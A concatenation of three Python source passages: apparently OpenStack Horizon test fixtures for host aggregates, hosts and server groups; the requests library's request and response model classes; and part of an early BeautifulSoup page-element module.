aggregate_2 = aggregates.Aggregate(aggregates.AggregateManager(None), {
"name": "bar",
"availability_zone": "testing",
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 2,
"metadata": {"foo": "testing", "bar": "testing"},
})
TEST.aggregates.add(aggregate_1)
TEST.aggregates.add(aggregate_2)
host1 = hosts.Host(hosts.HostManager(None), {
"host_name": "devstack001",
"service": "compute",
"zone": "testing",
})
host2 = hosts.Host(hosts.HostManager(None), {
"host_name": "devstack002",
"service": "nova-conductor",
"zone": "testing",
})
host3 = hosts.Host(hosts.HostManager(None), {
"host_name": "devstack003",
"service": "compute",
"zone": "testing",
})
host4 = hosts.Host(hosts.HostManager(None), {
"host_name": "devstack004",
"service": "compute",
"zone": "testing",
})
TEST.hosts.add(host1)
TEST.hosts.add(host2)
TEST.hosts.add(host3)
TEST.hosts.add(host4)
server_group_1 = server_groups.ServerGroup(
server_groups.ServerGroupsManager(None),
{
"id": "1",
"name": "server_group_1",
"policies": [],
},
)
server_group_2 = server_groups.ServerGroup(
server_groups.ServerGroupsManager(None),
{
"id": "2",
"name": "server_group_2",
"policies": ["affinity", "some_other_policy"],
},
)
server_group_3 = server_groups.ServerGroup(
server_groups.ServerGroupsManager(None),
{
"id": "3",
"name": "server_group_3",
"policies": ["anti-affinity", "some_other_policy"],
},
)
TEST.server_groups.add(server_group_1)
TEST.server_groups.add(server_group_2)
TEST.server_groups.add(server_group_3)
| |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import collections
import datetime
from io import BytesIO, UnsupportedOperation
from .hooks import default_hooks
from .structures import CaseInsensitiveDict
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
from .packages.urllib3.fields import RequestField
from .packages.urllib3.filepost import encode_multipart_formdata
from .packages.urllib3.util import parse_url
from .packages.urllib3.exceptions import (
DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
from .exceptions import (
HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
ContentDecodingError, ConnectionError, StreamConsumedError)
from .utils import (
guess_filename, get_auth_from_url, requote_uri,
stream_decode_response_unicode, to_key_val_list, parse_header_links,
iter_slices, guess_json_utf, super_len, to_native_string)
from .compat import (
cookielib, urlunparse, urlsplit, urlencode, str, bytes, StringIO,
is_py2, chardet, json, builtin_str, basestring)
from .status_codes import codes
#: The set of HTTP status codes that indicate an automatically
#: processable redirect.
REDIRECT_STATI = (
codes.moved, # 301
codes.found, # 302
codes.other, # 303
codes.temporary_redirect, # 307
codes.permanent_redirect, # 308
)
DEFAULT_REDIRECT_LIMIT = 30
CONTENT_CHUNK_SIZE = 10 * 1024
ITER_CHUNK_SIZE = 512
json_dumps = json.dumps
class RequestEncodingMixin(object):
@property
def path_url(self):
"""Build the path URL to use."""
url = []
p = urlsplit(self.url)
path = p.path
if not path:
path = '/'
url.append(path)
query = p.query
if query:
url.append('?')
url.append(query)
return ''.join(url)
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if isinstance(data, (str, bytes)):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
result = []
for k, vs in to_key_val_list(data):
if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
vs = [vs]
for v in vs:
if v is not None:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
@staticmethod
def _encode_files(files, data):
"""Build the body for a multipart/form-data request.
Will successfully encode files when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if (not files):
raise ValueError("Files must be provided.")
elif isinstance(data, basestring):
raise ValueError("Data must not be a string.")
new_fields = []
fields = to_key_val_list(data or {})
files = to_key_val_list(files or {})
for field, val in fields:
if isinstance(val, basestring) or not hasattr(val, '__iter__'):
val = [val]
for v in val:
if v is not None:
# Don't call str() on bytestrings: in Py3 it all goes wrong.
if not isinstance(v, bytes):
v = str(v)
new_fields.append(
(field.decode('utf-8') if isinstance(field, bytes) else field,
v.encode('utf-8') if isinstance(v, str) else v))
for (k, v) in files:
# support for explicit filename
ft = None
fh = None
if isinstance(v, (tuple, list)):
if len(v) == 2:
fn, fp = v
elif len(v) == 3:
fn, fp, ft = v
else:
fn, fp, ft, fh = v
else:
fn = guess_filename(v) or k
fp = v
if isinstance(fp, (str, bytes, bytearray)):
fdata = fp
else:
fdata = fp.read()
rf = RequestField(name=k, data=fdata,
filename=fn, headers=fh)
rf.make_multipart(content_type=ft)
new_fields.append(rf)
body, content_type = encode_multipart_formdata(new_fields)
return body, content_type
class RequestHooksMixin(object):
def register_hook(self, event, hook):
"""Properly register a hook."""
if event not in self.hooks:
raise ValueError('Unsupported event specified, with event name "%s"' % (event))
if isinstance(hook, collections.Callable):
self.hooks[event].append(hook)
elif hasattr(hook, '__iter__'):
self.hooks[event].extend(h for h in hook if isinstance(h, collections.Callable))
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
class Request(RequestHooksMixin):
"""A user-created :class:`Request <Request>` object.
Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server.
:param method: HTTP method to use.
:param url: URL to send.
:param headers: dictionary of headers to send.
:param files: dictionary of {filename: fileobject} files to multipart upload.
:param data: the body to attach to the request. If a dictionary is provided, form-encoding will take place.
:param json: json for the body to attach to the request (if data is not specified).
:param params: dictionary of URL parameters to append to the URL.
:param auth: Auth handler or (user, pass) tuple.
:param cookies: dictionary or CookieJar of cookies to attach to this request.
:param hooks: dictionary of callback hooks, for internal usage.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> req.prepare()
<PreparedRequest [GET]>
"""
def __init__(self,
method=None,
url=None,
headers=None,
files=None,
data=None,
params=None,
auth=None,
cookies=None,
hooks=None,
json=None):
# Default empty dicts for dict params.
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
self.hooks = default_hooks()
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
self.method = method
self.url = url
self.headers = headers
self.files = files
self.data = data
self.json = json
self.params = params
self.auth = auth
self.cookies = cookies
def __repr__(self):
return '<Request [%s]>' % (self.method)
def prepare(self):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
p = PreparedRequest()
p.prepare(
method=self.method,
url=self.url,
headers=self.headers,
files=self.files,
data=self.data,
json=self.json,
params=self.params,
auth=self.auth,
cookies=self.cookies,
hooks=self.hooks,
)
return p
class PreparedRequest(RequestEncodingMixin, RequestHooksMixin):
"""The fully mutable :class:`PreparedRequest <PreparedRequest>` object,
containing the exact bytes that will be sent to the server.
Generated from either a :class:`Request <Request>` object or manually.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> r = req.prepare()
<PreparedRequest [GET]>
>>> s = requests.Session()
>>> s.send(r)
<Response [200]>
"""
def __init__(self):
#: HTTP verb to send to the server.
self.method = None
#: HTTP URL to send the request to.
self.url = None
#: dictionary of HTTP headers.
self.headers = None
# The `CookieJar` used to create the Cookie header will be stored here
# after prepare_cookies is called
self._cookies = None
#: request body to send to the server.
self.body = None
#: dictionary of callback hooks, for internal usage.
self.hooks = default_hooks()
def prepare(self, method=None, url=None, headers=None, files=None,
data=None, params=None, auth=None, cookies=None, hooks=None,
json=None):
"""Prepares the entire request with the given parameters."""
self.prepare_method(method)
self.prepare_url(url, params)
self.prepare_headers(headers)
self.prepare_cookies(cookies)
self.prepare_body(data, files, json)
self.prepare_auth(auth, url)
# Note that prepare_auth must be last to enable authentication schemes
# such as OAuth to work on a fully prepared request.
# This MUST go after prepare_auth. Authenticators could add a hook
self.prepare_hooks(hooks)
def __repr__(self):
return '<PreparedRequest [%s]>' % (self.method)
def copy(self):
p = PreparedRequest()
p.method = self.method
p.url = self.url
p.headers = self.headers.copy() if self.headers is not None else None
p._cookies = _copy_cookie_jar(self._cookies)
p.body = self.body
p.hooks = self.hooks
return p
def prepare_method(self, method):
"""Prepares the given HTTP method."""
self.method = method
if self.method is not None:
self.method = self.method.upper()
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
#: We're unable to blindy call unicode/str functions
#: as this will include the bytestring indicator (b'')
#: on python 3.x.
#: https://github.com/kennethreitz/requests/pull/2238
if isinstance(url, bytes):
url = url.decode('utf8')
else:
url = unicode(url) if is_py2 else str(url)
# Don't do any URL preparation for non-HTTP schemes like `mailto`,
# `data` etc to work around exceptions from `url_parse`, which
# handles RFC 3986 only.
if ':' in url and not url.lower().startswith('http'):
self.url = url
return
# Support for unicode domain names and paths.
try:
scheme, auth, host, port, path, query, fragment = parse_url(url)
except LocationParseError as e:
raise InvalidURL(*e.args)
if not scheme:
raise MissingSchema("Invalid URL {0!r}: No schema supplied. "
"Perhaps you meant http://{0}?".format(
to_native_string(url, 'utf8')))
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
# Only want to apply IDNA to the hostname
try:
host = host.encode('idna').decode('utf-8')
except UnicodeError:
raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
if netloc:
netloc += '@'
netloc += host
if port:
netloc += ':' + str(port)
# Bare domains aren't valid URLs.
if not path:
path = '/'
if is_py2:
if isinstance(scheme, str):
scheme = scheme.encode('utf-8')
if isinstance(netloc, str):
netloc = netloc.encode('utf-8')
if isinstance(path, str):
path = path.encode('utf-8')
if isinstance(query, str):
query = query.encode('utf-8')
if isinstance(fragment, str):
fragment = fragment.encode('utf-8')
enc_params = self._encode_params(params)
if enc_params:
if query:
query = '%s&%s' % (query, enc_params)
else:
query = enc_params
url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))
self.url = url
def prepare_headers(self, headers):
"""Prepares the given HTTP headers."""
if headers:
self.headers = CaseInsensitiveDict((to_native_string(name), value) for name, value in headers.items())
else:
self.headers = CaseInsensitiveDict()
def prepare_body(self, data, files, json=None):
"""Prepares the given HTTP body data."""
# Check if file, fo, generator, iterator.
# If not, run through normal process.
# Nottin' on you.
body = None
content_type = None
length = None
if json is not None:
content_type = 'application/json'
body = json_dumps(json)
is_stream = all([
hasattr(data, '__iter__'),
not isinstance(data, (basestring, list, tuple, dict))
])
try:
length = super_len(data)
except (TypeError, AttributeError, UnsupportedOperation):
length = None
if is_stream:
body = data
if files:
raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
if length is not None:
self.headers['Content-Length'] = builtin_str(length)
else:
self.headers['Transfer-Encoding'] = 'chunked'
else:
# Multi-part file uploads.
if files:
(body, content_type) = self._encode_files(files, data)
else:
if data and json is None:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
else:
content_type = 'application/x-www-form-urlencoded'
self.prepare_content_length(body)
# Add content-type if it wasn't explicitly provided.
if content_type and ('content-type' not in self.headers):
self.headers['Content-Type'] = content_type
self.body = body
def prepare_content_length(self, body):
if hasattr(body, 'seek') and hasattr(body, 'tell'):
body.seek(0, 2)
self.headers['Content-Length'] = builtin_str(body.tell())
body.seek(0, 0)
elif body is not None:
l = super_len(body)
if l:
self.headers['Content-Length'] = builtin_str(l)
elif (self.method not in ('GET', 'HEAD')) and (self.headers.get('Content-Length') is None):
self.headers['Content-Length'] = '0'
def prepare_auth(self, auth, url=''):
"""Prepares the given HTTP auth data."""
# If no Auth is explicitly provided, extract it from the URL first.
if auth is None:
url_auth = get_auth_from_url(self.url)
auth = url_auth if any(url_auth) else None
if auth:
if isinstance(auth, tuple) and len(auth) == 2:
# special-case basic HTTP auth
auth = HTTPBasicAuth(*auth)
# Allow auth to make its changes.
r = auth(self)
# Update self to reflect the auth changes.
self.__dict__.update(r.__dict__)
# Recompute Content-Length
self.prepare_content_length(self.body)
def prepare_cookies(self, cookies):
"""Prepares the given HTTP cookie data.
This function eventually generates a ``Cookie`` header from the
given cookies using cookielib. Due to cookielib's design, the header
will not be regenerated if it already exists, meaning this function
can only be called once for the life of the
:class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls
to ``prepare_cookies`` will have no actual effect, unless the "Cookie"
header is removed beforehand."""
if isinstance(cookies, cookielib.CookieJar):
self._cookies = cookies
else:
self._cookies = cookiejar_from_dict(cookies)
cookie_header = get_cookie_header(self._cookies, self)
if cookie_header is not None:
self.headers['Cookie'] = cookie_header
def prepare_hooks(self, hooks):
"""Prepares the given hooks."""
# hooks can be passed as None to the prepare method and to this
# method. To prevent iterating over None, simply use an empty list
# if hooks is False-y
hooks = hooks or []
for event in hooks:
self.register_hook(event, hooks[event])
class Response(object):
"""The :class:`Response <Response>` object, which contains a
server's response to an HTTP request.
"""
__attrs__ = [
'_content',
'status_code',
'headers',
'url',
'history',
'encoding',
'reason',
'cookies',
'elapsed',
'request',
]
def __init__(self):
super(Response, self).__init__()
self._content = False
self._content_consumed = False
#: Integer Code of responded HTTP Status, e.g. 404 or 200.
self.status_code = None
#: Case-insensitive Dictionary of Response Headers.
#: For example, ``headers['content-encoding']`` will return the
#: value of a ``'Content-Encoding'`` response header.
self.headers = CaseInsensitiveDict()
#: File-like object representation of response (for advanced usage).
#: Use of ``raw`` requires that ``stream=True`` be set on the request.
# This requirement does not apply for use internally to Requests.
self.raw = None
#: Final URL location of Response.
self.url = None
#: Encoding to decode with when accessing r.text.
self.encoding = None
#: A list of :class:`Response <Response>` objects from
#: the history of the Request. Any redirect responses will end
#: up here. The list is sorted from the oldest to the most recent request.
self.history = []
#: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK".
self.reason = None
#: A CookieJar of Cookies the server sent back.
self.cookies = cookiejar_from_dict({})
#: The amount of time elapsed between sending the request
#: and the arrival of the response (as a timedelta).
#: This property specifically measures the time taken between sending
#: the first byte of the request and finishing parsing the headers. It
#: is therefore unaffected by consuming the response content or the
#: value of the ``stream`` keyword argument.
self.elapsed = datetime.timedelta(0)
#: The :class:`PreparedRequest <PreparedRequest>` object to which this
#: is a response.
self.request = None
def __getstate__(self):
# Consume everything; accessing the content attribute makes
# sure the content has been fully read.
if not self._content_consumed:
self.content
return dict(
(attr, getattr(self, attr, None))
for attr in self.__attrs__
)
def __setstate__(self, state):
for name, value in state.items():
setattr(self, name, value)
# pickled objects do not have .raw
setattr(self, '_content_consumed', True)
setattr(self, 'raw', None)
def __repr__(self):
return '<Response [%s]>' % (self.status_code)
def __bool__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __nonzero__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __iter__(self):
"""Allows you to use a response as an iterator."""
return self.iter_content(128)
@property
def ok(self):
try:
self.raise_for_status()
except HTTPError:
return False
return True
@property
def is_redirect(self):
"""True if this Response is a well-formed HTTP redirect that could have
been processed automatically (by :meth:`Session.resolve_redirects`).
"""
return ('location' in self.headers and self.status_code in REDIRECT_STATI)
@property
def is_permanent_redirect(self):
"""True if this Response one of the permanant versions of redirect"""
return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
@property
def apparent_encoding(self):
"""The apparent encoding, provided by the chardet library"""
return chardet.detect(self.content)['encoding']
def iter_content(self, chunk_size=1, decode_unicode=False):
"""Iterates over the response data. When stream=True is set on the
request, this avoids reading the content at once into memory for
large responses. The chunk size is the number of bytes it should
read into memory. This is not necessarily the length of each item
returned as decoding can take place.
If decode_unicode is True, content will be decoded using the best
available encoding based on the response.
"""
def generate():
try:
# Special case for urllib3.
try:
for chunk in self.raw.stream(chunk_size, decode_content=True):
yield chunk
except ProtocolError as e:
raise ChunkedEncodingError(e)
except DecodeError as e:
raise ContentDecodingError(e)
except ReadTimeoutError as e:
raise ConnectionError(e)
except AttributeError:
# Standard file-like object.
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
yield chunk
self._content_consumed = True
if self._content_consumed and isinstance(self._content, bool):
raise StreamConsumedError()
# simulate reading small chunks of the content
reused_chunks = iter_slices(self._content, chunk_size)
stream_chunks = generate()
chunks = reused_chunks if self._content_consumed else stream_chunks
if decode_unicode:
chunks = stream_decode_response_unicode(chunks, self)
return chunks
def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=None, delimiter=None):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
.. note:: This method is not reentrant safe.
"""
pending = None
for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
if delimiter:
lines = chunk.split(delimiter)
else:
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
for line in lines:
yield line
if pending is not None:
yield pending
@property
def content(self):
"""Content of the response, in bytes."""
if self._content is False:
# Read the contents.
try:
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed')
if self.status_code == 0:
self._content = None
else:
self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
except AttributeError:
self._content = None
self._content_consumed = True
# don't need to release the connection; that's been handled by urllib3
# since we exhausted the data.
return self._content
@property
def text(self):
"""Content of the response, in unicode.
If Response.encoding is None, encoding will be guessed using
``chardet``.
The encoding of the response content is determined based solely on HTTP
headers, following RFC 2616 to the letter. If you can take advantage of
non-HTTP knowledge to make a better guess at the encoding, you should
set ``r.encoding`` appropriately before accessing this property.
"""
# Try charset from content-type
content = None
encoding = self.encoding
if not self.content:
return str('')
# Fallback to auto-detected encoding.
if self.encoding is None:
encoding = self.apparent_encoding
# Decode unicode from given encoding.
try:
content = str(self.content, encoding, errors='replace')
except (LookupError, TypeError):
# A LookupError is raised if the encoding was not found which could
# indicate a misspelling or similar mistake.
#
# A TypeError can be raised if encoding is None
#
# So we try blindly encoding.
content = str(self.content, errors='replace')
return content
def json(self, **kwargs):
"""Returns the json-encoded content of a response, if any.
:param \*\*kwargs: Optional arguments that ``json.loads`` takes.
"""
if not self.encoding and len(self.content) > 3:
# No encoding set. JSON RFC 4627 section 3 states we should expect
# UTF-8, -16 or -32. Detect which one to use; If the detection or
# decoding fails, fall back to `self.text` (using chardet to make
# a best guess).
encoding = guess_json_utf(self.content)
if encoding is not None:
try:
return json.loads(self.content.decode(encoding), **kwargs)
except UnicodeDecodeError:
# Wrong UTF codec detected; usually because it's not UTF-8
# but some other 8-bit codec. This is an RFC violation,
# and the server didn't bother to tell us what codec *was*
# used.
pass
return json.loads(self.text, **kwargs)
@property
def links(self):
"""Returns the parsed header links of the response, if any."""
header = self.headers.get('link')
# l = MultiDict()
l = {}
if header:
links = parse_header_links(header)
for link in links:
key = link.get('rel') or link.get('url')
l[key] = link
return l
def raise_for_status(self):
"""Raises stored :class:`HTTPError`, if one occurred."""
http_error_msg = ''
if 400 <= self.status_code < 500:
http_error_msg = '%s Client Error: %s' % (self.status_code, self.reason)
elif 500 <= self.status_code < 600:
http_error_msg = '%s Server Error: %s' % (self.status_code, self.reason)
if http_error_msg:
raise HTTPError(http_error_msg, response=self)
def close(self):
"""Releases the connection back to the pool. Once this method has been
called the underlying ``raw`` object must not be accessed again.
*Note: Should not normally need to be called explicitly.*
"""
return self.raw.release_conn()
| |
import collections
import re
import sys
import warnings
from bs4.dammit import EntitySubstitution
DEFAULT_OUTPUT_ENCODING = "utf-8"
PY3K = (sys.version_info[0] > 2)
def _match_css_class(str):
"""Build a RE to match the given CSS class."""
return re.compile(r"(^|.*\s)%s($|\s)" % str)
def _alias(attr):
"""Alias one attribute name to another for backward compatibility"""
@property
def alias(self):
return getattr(self, attr)
@alias.setter
def alias(self):
return setattr(self, attr)
return alias
class PageElement(object):
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=None, previous_element=None):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous_element = previous_element
self.next_element = None
self.previous_sibling = None
self.next_sibling = None
if self.parent and self.parent.contents:
self.previous_sibling = self.parent.contents[-1]
self.previous_sibling.next_sibling = self
nextSibling = _alias("next_sibling") # BS3
previousSibling = _alias("previous_sibling") # BS3
def replace_with(self, replace_with):
if replace_with is self:
return
old_parent = self.parent
my_index = self.parent.index(self)
if (hasattr(replace_with, 'parent')
and replace_with.parent is self.parent):
# We're replacing this element with one of its siblings.
if self.parent.index(replace_with) < my_index:
# Furthermore, it comes before this element. That
# means that when we extract it, the index of this
# element will change.
my_index -= 1
self.extract()
old_parent.insert(my_index, replace_with)
replaceWith = replace_with # BS3
def replace_with_children(self):
my_parent = self.parent
my_index = self.parent.index(self)
self.extract()
for child in reversed(self.contents[:]):
my_parent.insert(my_index, child)
replaceWithChildren = replace_with_children # BS3
def extract(self):
"""Destructively rips this element out of the tree."""
if self.parent:
del self.parent.contents[self.parent.index(self)]
#Find the two elements that would be next to each other if
#this element (and any children) hadn't been parsed. Connect
#the two.
last_child = self._last_descendant()
next_element = last_child.next_element
if self.previous_element:
self.previous_element.next_element = next_element
if next_element:
next_element.previous_element = self.previous_element
self.previous_element = None
last_child.next_element = None
self.parent = None
if self.previous_sibling:
self.previous_sibling.next_sibling = self.next_sibling
if self.next_sibling:
self.next_sibling.previous_sibling = self.previous_sibling
self.previous_sibling = self.next_sibling = None
return self
def _last_descendant(self):
"Finds the last element beneath this object to be parsed."
last_child = self
while hasattr(last_child, 'contents') and last_child.contents:
last_child = last_child.contents[-1]
return last_child
# BS3: Not part of the API!
_lastRecursiveChild = _last_descendant
def insert(self, position, new_child):
if (isinstance(new_child, basestring)
and not isinstance(new_child, NavigableString)):
new_child = NavigableString(new_child)
position = min(position, len(self.contents))
if hasattr(new_child, 'parent') and new_child.parent is not None:
# We're 'inserting' an element that's already one
# of this object's children.
if new_child.parent is self:
if self.index(new_child) > position:
# Furthermore we're moving it further down the
# list of this object's children. That means that
# when we extract this element, our target index
# will jump down one.
position -= 1
new_child.extract()
new_child.parent = self
previous_child = None
if position == 0:
new_child.previous_sibling = None
new_child.previous_element = self
else:
previous_child = self.contents[position - 1]
new_child.previous_sibling = previous_child
new_child.previous_sibling.next_sibling = new_child
new_child.previous_element = previous_child._last_descendant()
if new_child.previous:
new_child.previous_element.next_element = new_child
new_childs_last_element = new_child._last_descendant()
if position >= len(self.contents):
new_child.next_sibling = None
parent = self
parents_next_sibling = None
while not parents_next_sibling:
parents_next_sibling = parent.next_sibling
parent = parent.parent
if not parent: # This is the last element in the document.
break
if parents_next_sibling:
new_childs_last_element.next_element = parents_next_sibling
else:
new_childs_last_element.next_element = None
else:
next_child = self.contents[position]
new_child.next_sibling = next_child
if new_child.next_sibling:
new_child.next_sibling.previous_sibling = new_child
new_childs_last_element.next_element = next_child
if new_childs_last_element.next_element:
new_childs_last_element.next_element.previous_element = new_childs_last_element
self.contents.insert(position, new_child)
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.insert(len(self.contents), tag)
def find_next(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._find_one(self.find_all_next, name, attrs, text, **kwargs)
findNext = find_next # BS3
def find_all_next(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
after this Tag in the document."""
return self._find_all(name, attrs, text, limit, self.next_elements,
**kwargs)
findAllNext = find_all_next # BS3
def find_next_sibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._find_one(self.find_next_siblings, name, attrs, text,
**kwargs)
findNextSibling = find_next_sibling # BS3
def find_next_siblings(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._find_all(name, attrs, text, limit,
self.next_siblings, **kwargs)
findNextSiblings = find_next_siblings # BS3
fetchNextSiblings = find_next_siblings # BS2
def find_previous(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._find_one(
self.find_all_previous, name, attrs, text, **kwargs)
findPrevious = find_previous # BS3
def find_all_previous(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._find_all(name, attrs, text, limit, self.previous_elements,
**kwargs)
findAllPrevious = find_all_previous # BS3
fetchPrevious = find_all_previous # BS2
def find_previous_sibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._find_one(self.find_previous_siblings, name, attrs, text,
**kwargs)
findPreviousSibling = find_previous_sibling # BS3
def find_previous_siblings(self, name=None, attrs={}, text=None,
limit=None, **kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._find_all(name, attrs, text, limit,
self.previous_siblings, **kwargs)
findPreviousSiblings = find_previous_siblings # BS3
fetchPreviousSiblings = find_previous_siblings # BS2
def find_parent(self, name=None, attrs={}, **kwargs):
"""Returns the closest parent of this Tag that matches the given
criteria."""
# NOTE: We can't use _find_one because findParents takes a different
# set of arguments.
r = None
l = self.find_parents(name, attrs, 1)
if l:
r = l[0]
return r
findParent = find_parent # BS3
def find_parents(self, name=None, attrs={}, limit=None, **kwargs):
"""Returns the parents of this Tag that match the given
criteria."""
return self._find_all(name, attrs, None, limit, self.parents,
**kwargs)
findParents = find_parents # BS3
fetchParents = find_parents # BS2
@property
def next(self):
return self.next_element
@property
def previous(self):
return self.previous_element
#These methods do the real heavy lifting.
def _find_one(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
def _find_all(self, name, attrs, text, limit, generator, **kwargs):
"Iterates over a generator looking for things that match."
if isinstance(name, SoupStrainer):
strainer = name
elif text is None and not limit and not attrs and not kwargs:
# Optimization to find all tags.
if name is True or name is None:
return [element for element in generator
if isinstance(element, Tag)]
# Optimization to find all tags with a given name.
elif isinstance(name, basestring):
return [element for element in generator
if isinstance(element, Tag) and element.name == name]
else:
strainer = SoupStrainer(name, attrs, text, **kwargs)
else:
# Build a SoupStrainer
strainer = SoupStrainer(name, attrs, text, **kwargs)
results = ResultSet(strainer)
while True:
try:
i = next(generator)
except StopIteration:
break
if i:
found = strainer.search(i)
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#These generators can be used to navigate starting from both
#NavigableStrings and Tags.
@property
def next_elements(self):
i = self.next_element
while i is not None:
yield i
i = i.next_element
@property
def next_siblings(self):
i = self.next_sibling
while i is not None:
yield i
i = i.next_sibling
@property
def previous_elements(self):
i = self.previous_element
while i is not None:
yield i
i = i.previous_element
@property
def previous_siblings(self):
i = self.previous_sibling
while i is not None:
yield i
i = i.previous_sibling
@property
def parents(self):
i = self.parent
while i is not None:
yield i
i = i.parent
# Old non-property versions of the generators, for backwards
# compatibility with BS3.
def nextGenerator(self):
return self.next_elements
def nextSiblingGenerator(self):
return self.next_siblings
def previousGenerator(self):
return self.previous_elements
def previousSiblingGenerator(self):
return self.previous_siblings
def parentGenerator(self):
return self.parents
# Utility methods
def substitute_encoding(self, str, encoding=None):
encoding = encoding or "utf-8"
return str.replace("%SOUP-ENCODING%", encoding)
class NavigableString(unicode, PageElement):
PREFIX = ''
SUFFIX = ''
def __new__(cls, value):
"""Create a new NavigableString.
When unpickling a NavigableString, this method is called with
the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
passed in to the superclass's __new__ or the superclass won't know
how to handle non-ASCII characters.
"""
if isinstance(value, unicode):
return unicode.__new__(cls, value)
return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
def __getnewargs__(self):
return (unicode(self),)
def __getattr__(self, attr):
"""text.string gives you text. This is for backwards
compatibility for Navigable*String, but for CData* it lets you
get the string without the CData wrapper."""
if attr == 'string':
return self
else:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
def output_ready(self, substitute_html_entities=False):
if substitute_html_entities:
output = EntitySubstitution.substitute_html(self)
else:
output = self
return self.PREFIX + output + self.SUFFIX
class CData(NavigableString):
PREFIX = u'<![CDATA['
SUFFIX = u']]>'
class ProcessingInstruction(NavigableString):
PREFIX = u'<?'
SUFFIX = u'?>'
class Comment(NavigableString):
PREFIX = u'<!--'
SUFFIX = u'-->'
class Declaration(NavigableString):
PREFIX = u'<!'
SUFFIX = u'!>'
class Doctype(NavigableString):
@classmethod
def for_name_and_ids(cls, name, pub_id, system_id):
value = name
if pub_id is not None:
value += ' PUBLIC "%s"' % pub_id
if system_id is not None:
value += ' SYSTEM "%s"' % system_id
return Doctype(value)
PREFIX = u'<!DOCTYPE '
SUFFIX = u'>'
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
def __init__(self, parser=None, builder=None, name=None, attrs=None,
parent=None, previous=None):
"Basic constructor."
if parser is None:
self.parser_class = None
else:
# We don't actually store the parser object: that lets extracted
# chunks be garbage-collected.
self.parser_class = parser.__class__
if name is None:
raise ValueError("No value provided for new tag's name.")
self.name = name
if attrs is None:
attrs = {}
else:
attrs = dict(attrs)
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
# Set up any substitutions, such as the charset in a META tag.
if builder is not None:
self.contains_substitutions = builder.set_up_substitutions(self)
self.can_be_empty_element = builder.can_be_empty_element(name)
else:
self.contains_substitutions = False
self.can_be_empty_element = False
